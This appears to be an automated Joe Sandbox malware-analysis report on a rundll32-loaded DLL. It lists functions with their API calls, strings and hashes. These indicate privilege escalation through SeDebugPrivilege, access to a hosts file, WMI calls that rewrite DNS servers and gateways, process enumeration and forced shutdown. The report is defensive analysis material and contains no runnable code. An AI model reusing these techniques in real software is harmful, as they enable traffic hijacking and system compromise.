Associated: 0000000B.00000002.3751565251.000000001001E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010020000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: f0908b3c00027b1b6766c7a861152c97f68057995d64c84cdc6b6950141695e5
Instruction ID: f44bec48cfd1db76282749f53c4335c8f231482f3a8341f8f54339fd7f20c475
Opcode Fuzzy Hash: f0908b3c00027b1b6766c7a861152c97f68057995d64c84cdc6b6950141695e5
Instruction Fuzzy Hash: 5EB092B4800620DBEA228F608CC840736A4A30C241310C801F910C3224D734C004DB60

Function 10001710 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(032151A0), ref: 10001726

Memory Dump Source

Source File: 0000000B.00000002.3751486928.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000B.00000002.3751456663.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751522529.0000000010012000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010016000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.000000001001E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010020000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: ab9ae1063b3321a9dca9df484140cc1d72058cb032d66644504e5a3d9c28704e
Instruction ID: 01a5768d41d78c628a35912e35f35776f9a67f167c5283b5b972b0fbab8e5750
Opcode Fuzzy Hash: ab9ae1063b3321a9dca9df484140cc1d72058cb032d66644504e5a3d9c28704e
Instruction Fuzzy Hash: A1B092B88005208BE612CB60898840B3675A30C2813008101FA10C3224E734C0009B20

Function 10004C60 Relevance: 1.5, APIs: 1, Instructions: 4registryCOMMON

Download Yara Rule

APIs

RegCloseKey.KERNEL32(1000AB02,1000AE3A,80000002,1000AB02,?,?,?,?,771B0F00), ref: 10004C65

Memory Dump Source

Source File: 0000000B.00000002.3751486928.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000B.00000002.3751456663.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751522529.0000000010012000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010016000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.000000001001E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010020000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: ab5e289189027fa5173076accd2a09c4160f3ba94fff289705bc0327fdc0764d
Instruction ID: 915426f7239b9cb48ebf138ba431655957d97aef7f5178b11ca68321cf6e6836
Opcode Fuzzy Hash: ab5e289189027fa5173076accd2a09c4160f3ba94fff289705bc0327fdc0764d
Instruction Fuzzy Hash: C1A00275904610AFDE40DBE4DA8C81A77F8AB85712B00C845F146C3510D634D840DB11

Function 10004890 Relevance: 1.5, APIs: 1, Instructions: 4networkCOMMON

Download Yara Rule

APIs

gethostbyname.WS2_32(?), ref: 10004895

Memory Dump Source

Source File: 0000000B.00000002.3751486928.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000B.00000002.3751456663.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751522529.0000000010012000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010016000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.000000001001E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010020000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd

Similarity

API ID: gethostbyname
String ID:
API String ID: 930432418-0
Opcode ID: 50365e01bdaa580be6bb6383309374887bc137a38b4d224bf2d268161eb1372f
Instruction ID: 26478d519f0170d2f3c1910e6c0f6e08a92a4de9d16a5e5f2b495c288a005660
Opcode Fuzzy Hash: 50365e01bdaa580be6bb6383309374887bc137a38b4d224bf2d268161eb1372f
Instruction Fuzzy Hash: 1EA00275908214ABDE00DBA5CA8C81E77E8BF85701B00C844F145C2110CA34D844DB51

Function 10004A10 Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

PathFileExistsA.SHLWAPI(?,1000BB9A,c:\ijbbn\ReadMe.txt,SeDebugPrivilege,00000001), ref: 10004A15

Memory Dump Source

Source File: 0000000B.00000002.3751486928.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000B.00000002.3751456663.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751522529.0000000010012000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010016000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.000000001001E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010020000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd

Similarity

API ID: ExistsFilePath
String ID:
API String ID: 1174141254-0
Opcode ID: a2ead1cd667fb061e5310f991c7bc1f390f2f87bae4bb2e0e60ae8b5a9b1b8f4
Instruction ID: ec750d28cb6fbb977bf46ecf5412cbf52607359abee085474d97c5188552acf2
Opcode Fuzzy Hash: a2ead1cd667fb061e5310f991c7bc1f390f2f87bae4bb2e0e60ae8b5a9b1b8f4
Instruction Fuzzy Hash: F4A00275904210AFDF00DBF4CA8C81A77E8ABC5701B00C844F145C3110D674D850DB11

Function 10004B30 Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

GetDriveTypeA.KERNEL32(10019D30,1000B666,10019D30), ref: 10004B35

Memory Dump Source

Source File: 0000000B.00000002.3751486928.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000B.00000002.3751456663.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751522529.0000000010012000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010016000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.000000001001E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010020000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd

Similarity

API ID: DriveType
String ID:
API String ID: 338552980-0
Opcode ID: 7196cfdbc03724b64f0cbb3baeb96423ea548a19a07590a7764bab302cc12c8f
Instruction ID: 9c3019adaafa634595d2db0f921d36bac7b56a2a79f4b30dc892680141a0bc5c
Opcode Fuzzy Hash: 7196cfdbc03724b64f0cbb3baeb96423ea548a19a07590a7764bab302cc12c8f
Instruction Fuzzy Hash: 74A002B5A04210ABDE00EBA5CB8C91A77FCAB89701B008845F549C2011C678DC40DB11

Function 10021790 Relevance: 1.3, APIs: 1, Instructions: 37memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040), ref: 100217ED

Memory Dump Source

Source File: 0000000B.00000002.3751565251.0000000010020000.00000040.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000B.00000002.3751456663.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751486928.0000000010001000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751522529.0000000010012000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010016000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.000000001001E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 1b9a90a861be483b221b99874f8e2b3b106077afceec4b8f99b5110b6b4da362
Instruction ID: 2c76a93c93dfa73a3cc5bc0969654cda5b929ba325a9910453c2048308b3be31
Opcode Fuzzy Hash: 1b9a90a861be483b221b99874f8e2b3b106077afceec4b8f99b5110b6b4da362
Instruction Fuzzy Hash: D9016D35E843289FDB61CF28CC087C8B7F1EB44351F6100A8E688B7285D7B5AE818E44

Non-executed Functions

Function 10006090 Relevance: 24.6, APIs: 10, Strings: 4, Instructions: 94stringCOMMON

Download Yara Rule

APIs

strrchr.MSVCRT ref: 1000610E
strncpy.MSVCRT ref: 10006125
strncpy.MSVCRT ref: 1000612F
GetSystemInfo.KERNEL32(?), ref: 10006139
GetCurrentProcess.KERNEL32(00000020,?), ref: 1000615A
OpenProcessToken.ADVAPI32(00000000), ref: 10006161
LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 10006172
AdjustTokenPrivileges.ADVAPI32 ref: 100061A7
CloseHandle.KERNEL32(00000010), ref: 100061B2
sscanf.MSVCRT ref: 100061DD

Strings

%[^, xrefs: 100061D3
etc\hosts, xrefs: 100061B8, 100061D8
SeDebugPrivilege, xrefs: 1000616C
c:\ijbbn, xrefs: 10006104

Memory Dump Source

Source File: 0000000B.00000002.3751486928.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000B.00000002.3751456663.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751522529.0000000010012000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010016000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.000000001001E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010020000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd

Similarity

API ID: ProcessTokenstrncpy$AdjustCloseCurrentHandleInfoLookupOpenPrivilegePrivilegesSystemValuesscanfstrrchr
String ID: %[^$SeDebugPrivilege$c:\ijbbn$etc\hosts
API String ID: 3677170833-726529856
Opcode ID: 1d3e106431755b1c910628fea7e204a29dca4c5e9b862ff13ab7f723e560162f
Instruction ID: 40014daf93b6d2639d90dc8878842a3feb4d3ad8defe4510b3edf01b2d76c729
Opcode Fuzzy Hash: 1d3e106431755b1c910628fea7e204a29dca4c5e9b862ff13ab7f723e560162f
Instruction Fuzzy Hash: 403156B5904360AFE310DF65CDC9A6BBBE8FF8A310F40851AF645866A1D7B4D580CB62

Function 10005A10 Relevance: 19.7, APIs: 4, Strings: 7, Instructions: 473COMMON

Download Yara Rule

APIs

wcscat.MSVCRT ref: 10005B73
InterlockedDecrement.KERNEL32(00000008), ref: 10005E38
_strcmpi.MSVCRT ref: 10005E55
InterlockedDecrement.KERNEL32(00000008), ref: 10005F59

Strings

ProcessID, xrefs: 10005D32
Name, xrefs: 10005D04
CommandLine, xrefs: 10005D1B
WQL, xrefs: 10005C19, 10005C2F
SELECT * FROM , xrefs: 10005B43
svchost.exe -k NetworkService, xrefs: 10005F73
svchost.exe, xrefs: 10005E4F

Memory Dump Source

Source File: 0000000B.00000002.3751486928.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000B.00000002.3751456663.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751522529.0000000010012000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010016000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.000000001001E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010020000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd

Similarity

API ID: DecrementInterlocked$_strcmpiwcscat
String ID: CommandLine$Name$ProcessID$SELECT * FROM $WQL$svchost.exe$svchost.exe -k NetworkService
API String ID: 1133782235-2685825574
Opcode ID: 0ce223196c44f2370e13e00feec4bfde119dc900f9d0c8cd7ae9a200d1607e84
Instruction ID: 0bcee575146c1e5c4bc0c3f0e2efc98e3102ad08c7b031823cab273adbecfb8d
Opcode Fuzzy Hash: 0ce223196c44f2370e13e00feec4bfde119dc900f9d0c8cd7ae9a200d1607e84
Instruction Fuzzy Hash: F502C4715043469FE720DF64C884AAFB7E9FB88394F008A2DF5999B280DB75DD81CB52

Function 10009640 Relevance: 16.9, Strings: 13, Instructions: 688COMMON

Download Yara Rule

Strings

WHERE , xrefs: 100097FC
IPEnabled=TRUE, xrefs: 100097E5, 10009831
SELECT * FROM , xrefs: 1000979A
WQL, xrefs: 10009874
DNSServerSearchOrder, xrefs: 10009E33
DefaultIPGateway, xrefs: 10009B8C
GatewayCostMetric, xrefs: 10009C0B
SetGateways, xrefs: 10009A5B, 10009C8A
Index, xrefs: 10009937
Win32_NetworkAdapterConfiguration.Index=, xrefs: 100099AB
Win32_NetworkAdapterConfiguration, xrefs: 10009683, 1000974A, 100097A8
SetDNSServerSearchOrder, xrefs: 10009D5C, 10009E84
ROOT\CIMV2, xrefs: 100096DA

Memory Dump Source

Source File: 0000000B.00000002.3751486928.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000B.00000002.3751456663.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751522529.0000000010012000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010016000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.000000001001E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010020000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd

Similarity

API ID: DecrementInterlocked
String ID: WHERE $DNSServerSearchOrder$DefaultIPGateway$GatewayCostMetric$IPEnabled=TRUE$Index$ROOT\CIMV2$SELECT * FROM $SetDNSServerSearchOrder$SetGateways$WQL$Win32_NetworkAdapterConfiguration$Win32_NetworkAdapterConfiguration.Index=
API String ID: 3448037634-1913130381
Opcode ID: 51b101c3c0528bff3dc3a5a8d8054af0c5bfe4afcaa312b89b4ad1427c49d158
Instruction ID: 422aa8304ea0dd682b4161e69f4c579d617248279d3008b81ee9107976b9911b
Opcode Fuzzy Hash: 51b101c3c0528bff3dc3a5a8d8054af0c5bfe4afcaa312b89b4ad1427c49d158
Instruction Fuzzy Hash: 02427F706083819FE364CB68C881B6BBBE4FF85384F10492DF599D7295DB70E949CB52

Function 10006BF0 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 119COMMON

Download Yara Rule

APIs

GetVersionExA.KERNEL32(?), ref: 10006C32
sprintf.MSVCRT ref: 10006D56

Strings

2003, xrefs: 10006CBB
2000, xrefs: 10006C8A
2008, xrefs: 10006CFF
Win %s SP%d, xrefs: 10006D50
Vista, xrefs: 10006CD2

Memory Dump Source

Source File: 0000000B.00000002.3751486928.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000B.00000002.3751456663.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751522529.0000000010012000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010016000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.000000001001E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010020000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd

Similarity

API ID: Versionsprintf
String ID: 2000$2003$2008$Vista$Win %s SP%d
API String ID: 1728264858-2264339393
Opcode ID: 58654c30ee2a7e86044c5e4d5daef33a756f752683a767f65627d44affe17baf
Instruction ID: 2420705a5d847b29da7bc657143dca2d79446832891e12a74f3d8b2563089a91
Opcode Fuzzy Hash: 58654c30ee2a7e86044c5e4d5daef33a756f752683a767f65627d44affe17baf
Instruction Fuzzy Hash: 7531E6357043445BF724C524C850AABB7D7F7C9360FA18B2EE95ACB384DA74DD098652

Function 100052A0 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 118fileCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNEL32(?,?), ref: 10005333
wsprintfA.USER32 ref: 1000537B
FindNextFileA.KERNEL32(?,?,?,?,?,00000000,?,?,00000000), ref: 100053E8
FindClose.KERNEL32(?,?,?,?,00000000,?,?,00000000), ref: 100053FB

Strings

., xrefs: 1000539C
%s\%s, xrefs: 10005375
\*.*, xrefs: 100052FB

Memory Dump Source

Source File: 0000000B.00000002.3751486928.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000B.00000002.3751456663.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751522529.0000000010012000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010016000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.000000001001E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010020000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID: %s\%s$.$\*.*
API String ID: 180737720-2210278135
Opcode ID: 6158b02a40cfa1e8ece74248f2afa690ecc6b7e7278f8e02395cafd1e3e61bb4
Instruction ID: 2e1d4cd89514877abfd59c36d78a4daaf7955f10aa71ebe425ca93e7152c8260
Opcode Fuzzy Hash: 6158b02a40cfa1e8ece74248f2afa690ecc6b7e7278f8e02395cafd1e3e61bb4
Instruction Fuzzy Hash: B63117765043445BD328CA74CC45AEBB7D9FBC8360F144F1DF6A6832C1DEB5DA088652

Function 10010400 Relevance: 11.1, APIs: 3, Strings: 3, Instructions: 619COMMON

Download Yara Rule

Strings

T, xrefs: 10010739
/, xrefs: 100104D8
U, xrefs: 10010734

Memory Dump Source

Source File: 0000000B.00000002.3751486928.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000B.00000002.3751456663.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751522529.0000000010012000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010016000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.000000001001E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010020000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID: /$T$U
API String ID: 0-733984016
Opcode ID: 525556d3e7044afcf2c16f4ef111071ab16cb3c8bd6f93a204e44dd9c90e561f
Instruction ID: 54e231698d8399043daabedda60659547f47bf3691f9c67918a969528f04d64c
Opcode Fuzzy Hash: 525556d3e7044afcf2c16f4ef111071ab16cb3c8bd6f93a204e44dd9c90e561f
Instruction Fuzzy Hash: 6822E0357083848BD714CE2894907AFBBE1EFC5350F54492EF9C98B382DAB5D989C792

Function 100100A0 Relevance: 3.1, APIs: 2, Instructions: 55timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?,?), ref: 100100D5
SystemTimeToFileTime.KERNEL32(?,?), ref: 100100E5

Part of subcall function 1000F800: FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?), ref: 1000F80D

Part of subcall function 1000F7D0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 1000F7EC

Memory Dump Source

Source File: 0000000B.00000002.3751486928.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000B.00000002.3751456663.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751522529.0000000010012000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010016000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.000000001001E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010020000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd

Similarity

API ID: Time$FileSystem$LocalUnothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 568878067-0
Opcode ID: 3c7b63944ef902037c5997f2c77d2aef4e3869aed4e7be9e2536b261e6034266
Instruction ID: 995162f2c5de06f072ebb5dfe50ac0562f18bd270405066c96cf5d8846fcc540
Opcode Fuzzy Hash: 3c7b63944ef902037c5997f2c77d2aef4e3869aed4e7be9e2536b261e6034266
Instruction Fuzzy Hash: CB2192B5914B419FD364CF69C885A67BBE4FF88604F008E2EE5DAC3611E774E508CB51

Function 1000EF70 Relevance: 2.9, Strings: 2, Instructions: 405COMMON

Download Yara Rule

Strings

K, xrefs: 1000EF93
P, xrefs: 1000EF84

Memory Dump Source

Source File: 0000000B.00000002.3751486928.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000B.00000002.3751456663.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751522529.0000000010012000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010016000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.000000001001E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010020000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID: K$P
API String ID: 0-420285281
Opcode ID: 1c7b2ccdeeeddba721736ec1dc4bfc125495b0ad89618cf55ada5aa0aec28a9a
Instruction ID: d915cf7a3844b20744192fc994c5be6d907e7ce11dd85da2ee4327704e6dc918
Opcode Fuzzy Hash: 1c7b2ccdeeeddba721736ec1dc4bfc125495b0ad89618cf55ada5aa0aec28a9a
Instruction Fuzzy Hash: 67D18D30119381AFD621CB698CC0EABFBF9AFDAB00F44490DF6D593291D6A1E5498762

Function 1000EB80 Relevance: 2.8, Strings: 2, Instructions: 275COMMON

Download Yara Rule

Strings

PTU, xrefs: 1000EB9B, 1000EBA1
K, xrefs: 1000EBA3

Memory Dump Source

Source File: 0000000B.00000002.3751486928.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000B.00000002.3751456663.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751522529.0000000010012000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010016000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.000000001001E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010020000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID: K$PTU
API String ID: 0-3860820754
Opcode ID: d9d7c021faa5aa006803064c67ea797f7eddb5ea43c61edc3565542cf26a862f
Instruction ID: 57dcef8c008dabf52abf9e4636a7a5e332a2cb07ba24af8fd2032e897ee0a7d3
Opcode Fuzzy Hash: d9d7c021faa5aa006803064c67ea797f7eddb5ea43c61edc3565542cf26a862f
Instruction Fuzzy Hash: AB91913011A3856EDB04DB688CC0E9BFBED9FD6704F04494EFA809B296D5E1D549CBB2

Function 10004B90 Relevance: 1.5, APIs: 1, Instructions: 14COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,00000000,1000718E), ref: 10004BAE

Memory Dump Source

Source File: 0000000B.00000002.3751486928.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000B.00000002.3751456663.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751522529.0000000010012000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010016000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.000000001001E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010020000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd

Similarity

API ID: AdjustPrivilegesToken
String ID:
API String ID: 2874748243-0
Opcode ID: 5c29c102cc9c653389ecacc8ddbee5a51ee40a280c19b6b36d48fb2c7fee9579
Instruction ID: 4a3738c88aa3e83466f495a16826e8226183112536dd6560dab8ac3166fdef8a
Opcode Fuzzy Hash: 5c29c102cc9c653389ecacc8ddbee5a51ee40a280c19b6b36d48fb2c7fee9579
Instruction Fuzzy Hash: 50D06CF5208342AF9708CF48D984C3BB7E9BBC8600F048D0CB59683210C730E849CB62

Function 100049F0 Relevance: 1.5, APIs: 1, Instructions: 6shutdownCOMMON

Download Yara Rule

APIs

ExitWindowsEx.USER32(?,00000000), ref: 100049FA

Memory Dump Source

Source File: 0000000B.00000002.3751486928.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000B.00000002.3751456663.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751522529.0000000010012000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010016000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.000000001001E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010020000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd

Similarity

API ID: ExitWindows
String ID:
API String ID: 1089080001-0
Opcode ID: a826d04bc4acaab0df248578ff412a1e3f22f76450817561718ce58b9e070933
Instruction ID: 6834376b89d028fd7ceef46dd2decc3cf13db427bf36252ff7f61f5970c34d6c
Opcode Fuzzy Hash: a826d04bc4acaab0df248578ff412a1e3f22f76450817561718ce58b9e070933
Instruction Fuzzy Hash: E2B092B4104200ABDA04CBA0C98493A77A8AB88200B00880CF48582210C630D841CA11

Function 1000DB90 Relevance: 1.4, Strings: 1, Instructions: 125COMMON

Download Yara Rule

Strings

bad d_code, xrefs: 1000DC8E

Memory Dump Source

Source File: 0000000B.00000002.3751486928.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000B.00000002.3751456663.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751522529.0000000010012000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010016000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.000000001001E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010020000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID: bad d_code
API String ID: 0-2582332627
Opcode ID: 327568906bed5a48e17ba06d2ddebb37f7008130ae1c85090ddd3765f816ae03
Instruction ID: 5051aabb8c8f42bf7f0ad7204590e299647211c71809f1c43ca0660982d1e5e8
Opcode Fuzzy Hash: 327568906bed5a48e17ba06d2ddebb37f7008130ae1c85090ddd3765f816ae03
Instruction Fuzzy Hash: 1541E3751082429FE315EF69D840EFF77E6EF88284F45846EF8858B205EB70E905C7A2

Function 1000F500 Relevance: .1, Instructions: 109COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3751486928.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true

